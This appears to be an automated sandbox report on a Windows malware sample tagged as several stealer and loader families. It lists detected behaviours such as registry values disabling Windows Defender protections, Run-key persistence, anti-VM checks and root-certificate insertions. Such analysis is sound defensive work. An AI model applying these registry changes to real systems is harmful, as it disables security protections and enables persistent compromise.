Malware Analysis Report

2025-01-22 14:56

Sample ID 241206-c3cbfswkes
Target 547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe
SHA256 547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf
Tags
amadey gcleaner lumma orcus stealc 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf

Threat Level: Known bad

The file 547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma orcus stealc 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Orcus

Gcleaner family

Lumma Stealer, LummaC

Lumma family

Suspicious use of NtCreateUserProcessOtherParentProcess

Stealc

Amadey

Amadey family

GCleaner

Orcus family

Stealc family

Orcurs Rat Executable

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Checks BIOS information in registry

Identifies Wine through registry keys

Windows security modification

Loads dropped DLL

Adds Run key to start application

Checks installed software on the system

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Runs net.exe

Modifies system certificate store

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 02:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 02:35

Reported

2024-12-06 02:38

Platform

win7-20240903-en

Max time kernel

149s

Max time network

143s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3028 created 1200 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012581001\7f22d62c97.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\7f22d62c97.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\7f22d62c97.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012581001\7f22d62c97.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\af361a9bea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\af361a9bea.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\7f22d62c97.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\7f22d62c97.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\5a603220f9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\5a603220f9.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\72405ef883.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\72405ef883.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-H21QO.tmp\i1A5m12.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012581001\7f22d62c97.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012582001\5a603220f9.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012582001\5a603220f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012583001\72405ef883.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012582001\5a603220f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012584001\c6a49f0ee6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1012580001\af361a9bea.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 